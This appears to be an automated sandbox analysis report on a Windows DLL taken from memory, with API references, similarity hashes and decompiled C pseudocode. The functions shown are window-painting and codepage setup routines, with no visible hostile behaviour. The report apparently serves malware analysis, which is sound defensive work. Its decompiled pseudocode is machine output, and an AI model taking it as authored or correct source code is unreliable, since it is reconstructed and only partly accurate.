0x6e4b9de9
0x6e4b9de9
0x6e4b9dec
0x6e4b9dec
0x6e4b9daa
0x6e4b9df3
0x6e4b9df7
0x6e4b9dfd
0x6e4b9e02
0x6e4b9e07
0x6e4b9e0d
0x6e4b9e0f
0x6e4b9e13
0x6e4b9e16
0x6e4b9e18
0x6e4b9e18
0x6e4b9e1e
0x6e4b9e23
0x6e4b9e26
0x6e4b9e2b
0x6e4b9e2e
0x6e4b9e2e
0x6e4b9e35
0x6e4b9e38
0x6e4b9e3d
0x6e4b9e3d
0x6e4b9e0d
0x6e4b9e40
0x6e4b9e47
0x6e4b9e4c
0x6e4b9e4d
0x6e4b9e53
0x00000000
0x6e4b9e55
0x6e4b9e55
0x00000000
0x6e4b9e55
0x6e4b9e53
0x6e4b9cf0
0x6e4b9cba
0x6e4b9ca8
0x6e4b9c9d
0x6e4b9c8b
0x00000000
0x6e4b9c75
0x00000000
0x6e4b9c40
0x6e4b9c3a
0x6e4b9c1f
0x6e4b9c0d
0x6e4b9c02
0x00000000

APIs

VariantInit.OLEAUT32(?), ref: 6E4B9CDA
VariantCopy.OLEAUT32(?,?), ref: 6E4B9CE8
SysFreeString.OLEAUT32(00000000), ref: 6E4B9D30
SysFreeString.OLEAUT32(-00000001), ref: 6E4B9DC2
VariantClear.OLEAUT32(?), ref: 6E4B9DF7
SysFreeString.OLEAUT32(-00000001), ref: 6E4B9E16
SysFreeString.OLEAUT32(00000000), ref: 6E4B9E47
SysFreeString.OLEAUT32(00000000), ref: 6E4B9E60
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E4B9EE4
SysAllocStringLen.OLEAUT32(00000000,-00000001), ref: 6E4B9EEE
MultiByteToWideChar.KERNEL32(00000003,00000000,lines,000000FF,00000000,00000000), ref: 6E4B9F0B
VarBstrCmp.OLEAUT32(00000000,00000000,00000400,00000000), ref: 6E4B9F28
SysFreeString.OLEAUT32(00000000), ref: 6E4B9F37
SysFreeString.OLEAUT32(00000000), ref: 6E4B9FBB
SysFreeString.OLEAUT32(00000000), ref: 6E4B9FFF
_com_issue_error.COMSUPP ref: 6E4BA041
_com_issue_error.COMSUPP ref: 6E4BA04B
_com_issue_error.COMSUPP ref: 6E4BA051
_com_issue_error.COMSUPP ref: 6E4BA05B
SysFreeString.OLEAUT32(76E3D5B0), ref: 6E4BA061

Strings

lines, xrefs: 6E4B9EDB, 6E4B9F02
!, xrefs: 6E4BA00A
offsetY, xrefs: 6E4B9CF6

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$_com_issue_error$Variant$ByteCharMultiWide$AllocBstrClearCopyInit
String ID: !$lines$offsetY
API String ID: 2214081791-1236976741
Opcode ID: df3023d253e4a3b966dad04983234efd3f5d4325f2dcebf5daa2c863de10ed4f
Instruction ID: 2873b28077cfb1b092b321e39c7c1e2aeccff01abe12ff2e3ae2a4000f62c316
Opcode Fuzzy Hash: df3023d253e4a3b966dad04983234efd3f5d4325f2dcebf5daa2c863de10ed4f
Instruction Fuzzy Hash: 01F16B70A0020ADFEB11DFF5C854FAEBBB8AF55714F10445AE915AB380DB76E905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C23F0, Relevance: 31.7, APIs: 21, Instructions: 183
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E6E4C23F0(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __fp0) {
				signed int _v12;
				struct tagPOINT _v68;
				struct tagPOINT _v84;
				intOrPtr _v88;
				int _v92;
				struct tagPAINTSTRUCT _v104;
				struct tagRECT _v120;
				intOrPtr _v124;
				signed int _v132;
				void* _v140;
				signed int _v144;
				void* _v152;
				void* _v164;
				int _v168;
				struct HWND__* _v172;
				struct HWND__* _v188;
				struct tagPAINTSTRUCT _v224;
				void* _v228;
				void* _v232;
				void* _v236;
				intOrPtr _t64;
				signed int _t71;
				struct HWND__* _t77;
				void* _t80;
				signed int _t91;
				signed int _t117;
				intOrPtr _t129;
				intOrPtr _t132;
				signed int _t137;
				int _t138;
				struct HDC__* _t140;
				signed int _t145;
				signed int _t148;
				signed int _t149;
				void* _t154;

				_t154 = __fp0;
				_t130 = __edi;
				_t112 = __ebx;
				_t135 = __ecx;
				_t64 =  *((intOrPtr*)(__ecx + 0xc));
				if(_t64 == 0) {
					L5:
					E6E4C2E30(_t112, _t135 + 4, _t130);
					_push(0x28);
					return E6E4C4D5B( *((intOrPtr*)(_t135 + 4)));
				} else {
					_t117 =  *((intOrPtr*)(__ecx + 0x14)) - _t64 & 0xfffffffc;
					if(_t117 < 0x1000) {
						L4:
						_push(_t117);
						E6E4C4D5B(_t64);
						 *(_t135 + 0xc) = 0;
						_t145 = _t145 + 8;
						 *(_t135 + 0x10) = 0;
						 *(_t135 + 0x14) = 0;
						goto L5;
					} else {
						_t129 =  *((intOrPtr*)(_t64 - 4));
						_t117 = _t117 + 0x23;
						if(_t64 - _t129 + 0xfffffffc > 0x1f) {
							E6E4CEF16(__ebx, _t117, _t129, __edi, __eflags);
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							asm("int3");
							_t148 = (_t145 & 0xfffffff0) - 0x88;
							_t71 =  *0x6e4ff008; // 0x2b098c7c
							_v12 = _t71 ^ _t148;
							_push(__ecx);
							_push(__edi);
							_t137 = _t117;
							_v144 = _t137;
							E6E4C9520(__edi,  &_v104, 0, 0x40);
							_t149 = _t148 + 0xc;
							asm("xorps xmm0, xmm0");
							asm("movaps [esp+0x20], xmm0");
							BeginPaint( *(_t137 + 0x18),  &_v104);
							_t77 = GetParent( *(_t137 + 0x18));
							_v140 = _t77;
							GetClientRect(_t77,  &_v120);
							_t138 = CreateCompatibleDC(_v104);
							_v140 = _t138;
							_t80 = CreateCompatibleBitmap(_v120.bottom, _v120.top - _v124, _v120.right - _v120.left);
							_v140 = _t80;
							_v152 = SelectObject(_t138, _t80);
							_v164 = SelectObject(_t138,  *(_v168 + 0x54));
							SendMessageW(_v172, 0x14, _t138, 0);
							SendMessageW(_v172, 0xf, _v168, 0);
							_t140 = _v168;
							SetBkMode(_t140, 1);
							SetTextColor(_t140, 0xffffff);
							GetClientRect( *(_v224.rgbReserved + 0x18),  &(_v104.fIncUpdate));
							_t132 = _v224.rgbReserved;
							_t91 = ClientToScreen( *(_t132 + 0x18),  &(_v104.fIncUpdate));
							__eflags = _t91;
							if(_t91 != 0) {
								ClientToScreen( *(_t132 + 0x18),  &_v68);
							}
							_v84.x = 0;
							_v104.fRestore = 0;
							ClientToScreen(_v188,  &_v84);
							_v84.x = _v104.fIncUpdate.x - _v84.x;
							_v104.fRestore = _v104.rgbReserved - _v104.fRestore;
							E6E4C1CD0(_t132, _t132, _t140, _t154, _t140, _v104.fIncUpdate.x - _v84.x, _v104.rgbReserved - _v104.fRestore);
							BitBlt(_v164, 0, 0, _v104.fRestore - _v88, _v104.fIncUpdate.x - _v84.x, _t140, _v104.rcPaint, _v92, 0xcc0020);
							SelectObject(_t140, _v228);
							SelectObject(_t140, _v232);
							DeleteObject(_v236);
							DeleteDC(_t140);
							EndPaint( *(_t132 + 0x18),  &_v224);
							__eflags = _v132 ^ _t149;
							return E6E4C4D4A(_v132 ^ _t149);
						} else {
							_t64 = _t129;
							goto L4;
						}
					}
				}
			}

0x6e4c23f0
0x6e4c23f0
0x6e4c23f0
0x6e4c23f1
0x6e4c23f3
0x6e4c23f8
0x6e4c243b
0x6e4c243e
0x6e4c2443
0x6e4c2451
0x6e4c23fa
0x6e4c23ff
0x6e4c2408
0x6e4c241c
0x6e4c241c
0x6e4c241e
0x6e4c2423
0x6e4c242a
0x6e4c242d
0x6e4c2434
0x00000000
0x6e4c240a
0x6e4c240a
0x6e4c240d
0x6e4c2418
0x6e4c2452
0x6e4c2457
0x6e4c2458
0x6e4c2459
0x6e4c245a
0x6e4c245b
0x6e4c245c
0x6e4c245d
0x6e4c245e
0x6e4c245f
0x6e4c2466
0x6e4c246c
0x6e4c2473
0x6e4c247a
0x6e4c247b
0x6e4c2482
0x6e4c2487
0x6e4c248b
0x6e4c2490
0x6e4c2497
0x6e4c249a
0x6e4c24a3
0x6e4c24ac
0x6e4c24be
0x6e4c24c2
0x6e4c24d2
0x6e4c24e6
0x6e4c24ea
0x6e4c24f2
0x6e4c2500
0x6e4c251d
0x6e4c2521
0x6e4c252f
0x6e4c2531
0x6e4c2538
0x6e4c2544
0x6e4c2556
0x6e4c2558
0x6e4c2564
0x6e4c256a
0x6e4c256c
0x6e4c2579
0x6e4c2579
0x6e4c2583
0x6e4c2590
0x6e4c259b
0x6e4c25b6
0x6e4c25bd
0x6e4c25c4
0x6e4c25fd
0x6e4c2608
0x6e4c2613
0x6e4c261d
0x6e4c2624
0x6e4c2632
0x6e4c2643
0x6e4c264d
0x6e4c241a
0x6e4c241a
0x00000000
0x6e4c241a
0x6e4c2418
0x6e4c2408

APIs

BeginPaint.USER32(?,?), ref: 6E4C24A3
GetParent.USER32(?), ref: 6E4C24AC
GetClientRect.USER32(00000000,?), ref: 6E4C24C2
CreateCompatibleDC.GDI32(?), ref: 6E4C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E4C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E4C24F6
SelectObject.GDI32(00000000,?), ref: 6E4C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E4C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E4C252F
SetBkMode.GDI32(?,00000001), ref: 6E4C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E4C2544
GetClientRect.USER32(?,?), ref: 6E4C2556
ClientToScreen.USER32(?,?), ref: 6E4C2564
ClientToScreen.USER32(?,?), ref: 6E4C2579
ClientToScreen.USER32(?,?), ref: 6E4C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E4C25FD
SelectObject.GDI32(?,?), ref: 6E4C2608
SelectObject.GDI32(?,?), ref: 6E4C2613
DeleteObject.GDI32(?), ref: 6E4C261D
DeleteDC.GDI32(?), ref: 6E4C2624
EndPaint.USER32(?,?), ref: 6E4C2632

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: 19d5c7b2cad79eae46085a70d07423ec8655ea38d32e6108b8c45f7b4f35ba22
Instruction ID: a4f4ba4933aaff7c8c9ac57620fbb3a6133bbc8282c155c126e9499dea59fa55
Opcode Fuzzy Hash: 19d5c7b2cad79eae46085a70d07423ec8655ea38d32e6108b8c45f7b4f35ba22
Instruction Fuzzy Hash: 8B614C71104B01AFDB209F74D908F6FBBE9FF89710F00491DF6A5922A1DB70A905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6E4C2460, Relevance: 31.6, APIs: 21, Instructions: 141
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E6E4C2460(intOrPtr __ecx, void* __edi, void* __esi) {
				signed int _v8;
				struct tagPOINT _v64;
				struct tagPOINT _v80;
				intOrPtr _v84;
				int _v88;
				struct tagPAINTSTRUCT _v100;
				struct tagRECT _v116;
				intOrPtr _v120;
				signed int _v128;
				void* _v136;
				intOrPtr _v140;
				void* _v148;
				void* _v160;
				int _v164;
				struct HWND__* _v168;
				struct HWND__* _v184;
				struct tagPAINTSTRUCT _v220;
				void* _v224;
				void* _v228;
				void* _v232;
				signed int _t56;
				struct HWND__* _t62;
				void* _t65;
				intOrPtr _t111;
				intOrPtr _t114;
				int _t115;
				struct HDC__* _t117;
				signed int _t119;
				signed int _t121;
				signed int _t122;
				void* _t125;

				_t121 = (_t119 & 0xfffffff0) - 0x88;
				_t56 =  *0x6e4ff008; // 0x2b098c7c
				_v8 = _t56 ^ _t121;
				_push(__edi);
				_t114 = __ecx;
				_v140 = __ecx;
				E6E4C9520(__edi,  &_v100, 0, 0x40);
				_t122 = _t121 + 0xc;
				asm("xorps xmm0, xmm0");
				asm("movaps [esp+0x20], xmm0");
				BeginPaint( *(_t114 + 0x18),  &_v100);
				_t62 = GetParent( *(_t114 + 0x18));
				_v136 = _t62;
				GetClientRect(_t62,  &_v116);
				_t115 = CreateCompatibleDC(_v100);
				_v136 = _t115;
				_t65 = CreateCompatibleBitmap(_v116.bottom, _v116.top - _v120, _v116.right - _v116.left);
				_v136 = _t65;
				_v148 = SelectObject(_t115, _t65);
				_v160 = SelectObject(_t115,  *(_v164 + 0x54));
				SendMessageW(_v168, 0x14, _t115, 0);
				SendMessageW(_v168, 0xf, _v164, 0);
				_t117 = _v164;
				SetBkMode(_t117, 1);
				SetTextColor(_t117, 0xffffff);
				GetClientRect( *(_v220.rgbReserved + 0x18),  &(_v100.fIncUpdate));
				_t111 = _v220.rgbReserved;
				if(ClientToScreen( *(_t111 + 0x18),  &(_v100.fIncUpdate)) != 0) {
					ClientToScreen( *(_t111 + 0x18),  &_v64);
				}
				_v80.x = 0;
				_v100.fRestore = 0;
				ClientToScreen(_v184,  &_v80);
				_v80.x = _v100.fIncUpdate.x - _v80.x;
				_v100.fRestore = _v100.rgbReserved - _v100.fRestore;
				E6E4C1CD0(_t111, _t111, _t117, _t125, _t117, _v100.fIncUpdate.x - _v80.x, _v100.rgbReserved - _v100.fRestore);
				BitBlt(_v160, 0, 0, _v100.fRestore - _v84, _v100.fIncUpdate.x - _v80.x, _t117, _v100.rcPaint, _v88, 0xcc0020);
				SelectObject(_t117, _v224);
				SelectObject(_t117, _v228);
				DeleteObject(_v232);
				DeleteDC(_t117);
				EndPaint( *(_t111 + 0x18),  &_v220);
				return E6E4C4D4A(_v128 ^ _t122);
			}

0x6e4c2466
0x6e4c246c
0x6e4c2473
0x6e4c247b
0x6e4c2482
0x6e4c2487
0x6e4c248b
0x6e4c2490
0x6e4c2497
0x6e4c249a
0x6e4c24a3
0x6e4c24ac
0x6e4c24be
0x6e4c24c2
0x6e4c24d2
0x6e4c24e6
0x6e4c24ea
0x6e4c24f2
0x6e4c2500
0x6e4c251d
0x6e4c2521
0x6e4c252f
0x6e4c2531
0x6e4c2538
0x6e4c2544
0x6e4c2556
0x6e4c2558
0x6e4c256c
0x6e4c2579
0x6e4c2579
0x6e4c2583
0x6e4c2590
0x6e4c259b
0x6e4c25b6
0x6e4c25bd
0x6e4c25c4
0x6e4c25fd
0x6e4c2608
0x6e4c2613
0x6e4c261d
0x6e4c2624
0x6e4c2632
0x6e4c264d

APIs

BeginPaint.USER32(?,?), ref: 6E4C24A3
GetParent.USER32(?), ref: 6E4C24AC
GetClientRect.USER32(00000000,?), ref: 6E4C24C2
CreateCompatibleDC.GDI32(?), ref: 6E4C24C8
CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E4C24EA
SelectObject.GDI32(00000000,00000000), ref: 6E4C24F6
SelectObject.GDI32(00000000,?), ref: 6E4C2508
SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E4C2521
SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E4C252F
SetBkMode.GDI32(?,00000001), ref: 6E4C2538
SetTextColor.GDI32(?,00FFFFFF), ref: 6E4C2544
GetClientRect.USER32(?,?), ref: 6E4C2556
ClientToScreen.USER32(?,?), ref: 6E4C2564
ClientToScreen.USER32(?,?), ref: 6E4C2579
ClientToScreen.USER32(?,?), ref: 6E4C259B
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 6E4C25FD
SelectObject.GDI32(?,?), ref: 6E4C2608
SelectObject.GDI32(?,?), ref: 6E4C2613
DeleteObject.GDI32(?), ref: 6E4C261D
DeleteDC.GDI32(?), ref: 6E4C2624
EndPaint.USER32(?,?), ref: 6E4C2632

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000002.00000002.729149049.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729191228.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.729208253.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.729215802.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientObject$Select$Screen$CompatibleCreateDeleteMessagePaintRectSend$BeginBitmapColorModeParentText
String ID:
API String ID: 2796758630-0
Opcode ID: fe6f208adfb7dd06c96ad0371a338e9db73fdedc7a3afc39335cea36d10ccf50
Instruction ID: 66a58d4f1b82c98f296b93cd0a0806b13ba465a8f588e5aaaf90e90aa251a8d8
Opcode Fuzzy Hash: fe6f208adfb7dd06c96ad0371a338e9db73fdedc7a3afc39335cea36d10ccf50
Instruction Fuzzy Hash: 39511571408B01AFDB21AF74D908F6EBBE9FF89710F00491DF6A592261DB31A905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 6E4D7B6C, Relevance: 22.8, APIs: 15, Instructions: 296
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E6E4D7B6C(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4) {
				signed int _v8;
				char _v21;
				intOrPtr _v22;
				struct _cpinfo _v28;
				void* _v32;
				void* _v36;
				void* _v40;
				intOrPtr* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr* _v56;
				intOrPtr _v60;
				signed int* _v64;
				signed int* _v68;
				void* _v72;
				char _v76;
				signed int _t101;
				intOrPtr* _t106;
				signed int _t123;
				signed short _t126;
				void* _t130;
				void* _t134;
				void* _t137;
				void* _t138;
				intOrPtr _t139;
				void* _t141;
				signed int _t142;
				intOrPtr* _t143;
				signed char _t160;
				signed char _t165;
				signed int _t166;
				void* _t168;
				signed int _t170;
				intOrPtr _t172;
				void* _t179;
				signed int* _t180;
				signed int* _t181;
				signed int _t182;
				signed char* _t189;
				signed char* _t190;
				void* _t193;
				signed int _t195;
				intOrPtr _t198;
				short* _t210;
				intOrPtr* _t212;
				intOrPtr* _t216;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t220;

				_t101 =  *0x6e4ff008; // 0x2b098c7c
				_v8 = _t101 ^ _t218;
				_t212 = _a4;
				_t170 = 0;
				_v56 = _t212;
				_v32 = 0;
				_t172 =  *((intOrPtr*)(_t212 + 0xa8));
				_v36 = 0;
				_v40 = 0;
				_v52 = 0;
				_v76 = _t212;
				_v72 = 0;
				if(_t172 == 0) {
					__eflags =  *(_t212 + 0x8c);
					if( *(_t212 + 0x8c) != 0) {
						asm("lock dec dword [eax]");
					}
					 *(_t212 + 0x8c) = _t170;
					__eflags = 0;
					 *(_t212 + 0x90) = _t170;
					 *_t212 = 0x6e4f0228;
					 *((intOrPtr*)(_t212 + 0x94)) = 0x6e4f04a8;
					 *((intOrPtr*)(_t212 + 0x98)) = 0x6e4f0628;
					 *((intOrPtr*)(_t212 + 4)) = 1;
					L41:
					return E6E4C4D4A(_v8 ^ _t218);
				}
				_t106 = _t212 + 8;
				_v44 = 0;
				if( *_t106 != 0) {
					L3:
					_v44 = E6E4DCCCD(_t172, 1, 4);
					E6E4D9B98(_t170);
					_v32 = E6E4DCCCD(_t172, 0x180, 2);
					E6E4D9B98(_t170);
					_v36 = E6E4DCCCD(_t172, 0x180, 1);
					E6E4D9B98(_t170);
					_v40 = E6E4DCCCD(_t172, 0x180, 1);
					E6E4D9B98(_t170);
					_t198 = E6E4DCCCD(_t172, 0x101, 1);
					_v52 = _t198;
					E6E4D9B98(_t170);
					_t220 = _t219 + 0x3c;
					if(_v44 == _t170 || _v32 == _t170 || _t198 == 0 || _v36 == _t170 || _v40 == _t170) {
						L36:
						E6E4D9B98(_v44);
						E6E4D9B98(_v32);
						E6E4D9B98(_v36);
						E6E4D9B98(_v40);
						_t170 = 1;
						__eflags = 1;
						goto L37;
					} else {
						_t123 = _t170;
						do {
							 *(_t123 + _t198) = _t123;
							_t123 = _t123 + 1;
						} while (_t123 < 0x100);
						if(GetCPInfo( *(_t212 + 8),  &_v28) == 0) {
							goto L36;
						}
						_t126 = _v28;
						_t236 = _t126 - 5;
						if(_t126 > 5) {
							goto L36;
						}
						_t28 = _t198 + 1; // 0x1
						_v48 = _t126 & 0x0000ffff;
						_t130 = E6E4DF664(_t198, _t212, _t236, _t170,  *((intOrPtr*)(_t212 + 0xa8)), 0x100, _t28, 0xff, _v36 + 0x81, 0xff,  *(_t212 + 8), _t170);
						_t220 = _t220 + 0x24;
						_t237 = _t130;
						if(_t130 == 0) {
							goto L36;
						}
						_t34 = _t198 + 1; // 0x1
						_t134 = E6E4DF664(_t198, _t212, _t237, _t170,  *((intOrPtr*)(_t212 + 0xa8)), 0x200, _t34, 0xff, _v40 + 0x81, 0xff,  *(_t212 + 8), _t170);
						_t220 = _t220 + 0x24;
						if(_t134 == 0) {
							goto L36;
						}
						if(_v48 <= 1 || _v22 == _t170) {
							L22:
							_v60 = _v32 + 0x100;
							_t137 = E6E4DF32A(_t170, _t198, _t212, _t243, _t170, 1, _t198, 0x100, _v32 + 0x100,  *(_t212 + 8), _t170);
							_t220 = _t220 + 0x1c;
							if(_t137 == 0) {
								goto L36;
							}
							_t193 = _v32;
							_t138 = _t193 + 0xfe;
							 *_t138 = 0;
							_t179 = _v36;
							_v32 = _t138;
							_t139 = _v40;
							 *(_t179 + 0x7f) = _t170;
							_t180 = _t179 - 0xffffff80;
							 *(_t139 + 0x7f) = _t170;
							_v64 = _t180;
							 *_t180 = _t170;
							_t181 = _t139 + 0x80;
							_v68 = _t181;
							 *_t181 = _t170;
							if(_v48 <= 1 || _v22 == _t170) {
								L32:
								_t182 = 0x3f;
								memcpy(_t193, _t193 + 0x200, _t182 << 2);
								_push(0x1f);
								asm("movsw");
								_t141 = memcpy(_v36, _v36 + 0x100, 0 << 2);
								_push(0x1f);
								asm("movsw");
								asm("movsb");
								_t142 = memcpy(_t141, _t141 + 0x100, 0 << 2);
								asm("movsw");
								asm("movsb");
								_t216 = _v56;
								if( *((intOrPtr*)(_t216 + 0x8c)) != 0) {
									asm("lock xadd [ecx], eax");
									if((_t142 | 0xffffffff) == 0) {
										E6E4D9B98( *(_t216 + 0x90) - 0xfe);
										E6E4D9B98( *(_t216 + 0x94) - 0x80);
										E6E4D9B98( *(_t216 + 0x98) - 0x80);
										E6E4D9B98( *((intOrPtr*)(_t216 + 0x8c)));
									}
								}
								_t143 = _v44;
								 *_t143 = 1;
								 *((intOrPtr*)(_t216 + 0x8c)) = _t143;
								 *_t216 = _v60;
								 *(_t216 + 0x90) = _v32;
								 *(_t216 + 0x94) = _v64;
								 *(_t216 + 0x98) = _v68;
								 *(_t216 + 4) = _v48;
								L37:
								E6E4D9B98(_v52);
								goto L41;
							} else {
								_t189 =  &_v21;
								while(1) {
									_t160 =  *_t189;
									if(_t160 == 0) {
										break;
									}
									_t217 =  *(_t189 - 1) & 0x000000ff;
									if(_t217 > (_t160 & 0x000000ff)) {
										L30:
										_t189 =  &(_t189[2]);
										if( *(_t189 - 1) != _t170) {
											continue;
										}
										break;
									}
									_t210 = _t193 + 0x100 + _t217 * 2;
									do {
										_t217 = _t217 + 1;
										 *_t210 = 0x8000;
										_t210 = _t210 + 2;
									} while (_t217 <= ( *_t189 & 0x000000ff));
									goto L30;
								}
								goto L32;
							}
						} else {
							_t190 =  &_v21;
							while(1) {
								_t165 =  *_t190;
								if(_t165 == 0) {
									goto L22;
								}
								_t195 =  *(_t190 - 1) & 0x000000ff;
								_t166 = _t165 & 0x000000ff;
								while(_t195 <= _t166) {
									 *((char*)(_t195 + _t198)) = 0x20;
									_t195 = _t195 + 1;
									__eflags = _t195;
									_t166 =  *_t190 & 0x000000ff;
								}
								_t190 =  &(_t190[2]);
								_t243 =  *(_t190 - 1) - _t170;
								if( *(_t190 - 1) != _t170) {
									continue;
								}
								goto L22;
							}
							goto L22;
						}
					}
				}
				_push(_t106);
				_push(0x1004);
				_push(_t172);
				_push(0);
				_push( &_v76);
				_t168 = E6E4DF178(0, __edx, __edi, _t212);
				_t220 = _t219 + 0x14;
				if(_t168 != 0) {
					goto L36;
				}
				goto L3;
			}

0x6e4d7b74
0x6e4d7b7b
0x6e4d7b80
0x6e4d7b83
0x6e4d7b86
0x6e4d7b89
0x6e4d7b8c
0x6e4d7b92
0x6e4d7b95
0x6e4d7b98
0x6e4d7b9b
0x6e4d7b9e
0x6e4d7ba3
0x6e4d7ec3
0x6e4d7ec5
0x6e4d7ec7
0x6e4d7ec7
0x6e4d7eca
0x6e4d7ed0
0x6e4d7ed2
0x6e4d7ed8
0x6e4d7ede
0x6e4d7ee8
0x6e4d7ef2
0x6e4d7ef9
0x6e4d7f09
0x6e4d7f09
0x6e4d7ba9
0x6e4d7bac
0x6e4d7bb1
0x6e4d7bcf
0x6e4d7bd9
0x6e4d7bdc
0x6e4d7bef
0x6e4d7bf2
0x6e4d7c00
0x6e4d7c03
0x6e4d7c11
0x6e4d7c14
0x6e4d7c25
0x6e4d7c28
0x6e4d7c2b
0x6e4d7c30
0x6e4d7c36
0x6e4d7e8a
0x6e4d7e8d
0x6e4d7e95
0x6e4d7e9d
0x6e4d7ea5
0x6e4d7eaf
0x6e4d7eaf
0x00000000
0x6e4d7c5f
0x6e4d7c5f
0x6e4d7c61
0x6e4d7c61
0x6e4d7c64
0x6e4d7c65
0x6e4d7c7b
0x00000000
0x00000000
0x6e4d7c81
0x6e4d7c84
0x6e4d7c87
0x00000000
0x00000000
0x6e4d7c94
0x6e4d7c97
0x6e4d7cb7
0x6e4d7cbc
0x6e4d7cbf
0x6e4d7cc1
0x00000000
0x00000000
0x6e4d7cdb
0x6e4d7ceb
0x6e4d7cf0
0x6e4d7cf5
0x00000000
0x00000000
0x6e4d7cff
0x6e4d7d2c
0x6e4d7d42
0x6e4d7d45
0x6e4d7d4a
0x6e4d7d4f
0x00000000
0x00000000
0x6e4d7d55
0x6e4d7d5a
0x6e4d7d60
0x6e4d7d63
0x6e4d7d66
0x6e4d7d69
0x6e4d7d6c
0x6e4d7d6f
0x6e4d7d76
0x6e4d7d79
0x6e4d7d7c
0x6e4d7d7e
0x6e4d7d84
0x6e4d7d87
0x6e4d7d89
0x6e4d7dcb
0x6e4d7dcd
0x6e4d7dd6
0x6e4d7ddb
0x6e4d7dde
0x6e4d7de8
0x6e4d7dea
0x6e4d7ded
0x6e4d7def
0x6e4d7df8
0x6e4d7dfa
0x6e4d7dfc
0x6e4d7dfd
0x6e4d7e08
0x6e4d7e0d
0x6e4d7e11
0x6e4d7e1f
0x6e4d7e32
0x6e4d7e40
0x6e4d7e4b
0x6e4d7e50
0x6e4d7e11
0x6e4d7e53
0x6e4d7e56
0x6e4d7e5c
0x6e4d7e65
0x6e4d7e6a
0x6e4d7e73
0x6e4d7e7c
0x6e4d7e85
0x6e4d7eb0
0x6e4d7eb3
0x00000000
0x6e4d7d90
0x6e4d7d90
0x6e4d7d93
0x6e4d7d93
0x6e4d7d97
0x00000000
0x00000000
0x6e4d7d99
0x6e4d7da2
0x6e4d7dc0
0x6e4d7dc0
0x6e4d7dc6
0x00000000
0x00000000
0x00000000
0x6e4d7dc6
0x6e4d7daa
0x6e4d7dad
0x6e4d7db2
0x6e4d7db3
0x6e4d7db6
0x6e4d7dbc
0x00000000
0x6e4d7dad
0x00000000
0x6e4d7dc8
0x6e4d7d06
0x6e4d7d06
0x6e4d7d09
0x6e4d7d09
0x6e4d7d0d
0x00000000
0x00000000
0x6e4d7d0f
0x6e4d7d13
0x6e4d7d20
0x6e4d7d18
0x6e4d7d1c
0x6e4d7d1c
0x6e4d7d1d
0x6e4d7d1d
0x6e4d7d24
0x6e4d7d27
0x6e4d7d2a
0x00000000
0x00000000
0x00000000
0x6e4d7d2a
0x00000000
0x6e4d7d09
0x6e4d7cff
0x6e4d7c36
0x6e4d7bb3
0x6e4d7bb4
0x6e4d7bb9
0x6e4d7bbd
0x6e4d7bbe
0x6e4d7bbf
0x6e4d7bc4
0x6e4d7bc9
0x00000000
0x00000000
0x00000000

APIs

_free.LIBCMT ref: 6E4D7BDC
_free.LIBCMT ref: 6E4D7BF2
_free.LIBCMT ref: 6E4D7C03
_free.LIBCMT ref: 6E4D7C14
_free.LIBCMT ref: 6E4D7C2B
GetCPInfo.KERNEL32(?,?), ref: 6E4D7C73

Part of subcall function 6E4DF178: _free.LIBCMT ref: 6E4DF1E3

_free.LIBCMT ref: 6E4D7E1F
_free.LIBCMT ref: 6E4D7E32
_free.LIBCMT ref: 6E4D7E40
_free.LIBCMT ref: 6E4D7E4B
_free.LIBCMT ref: 6E4D7E8D
_free.LIBCMT ref: 6E4D7E95
_free.LIBCMT ref: 6E4D7E9D
_free.LIBCMT ref: 6E4D7EA5
_free.LIBCMT ref: 6E4D7EB3

Memory Dump Source

Source File: 00000002.00000002.729159582.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

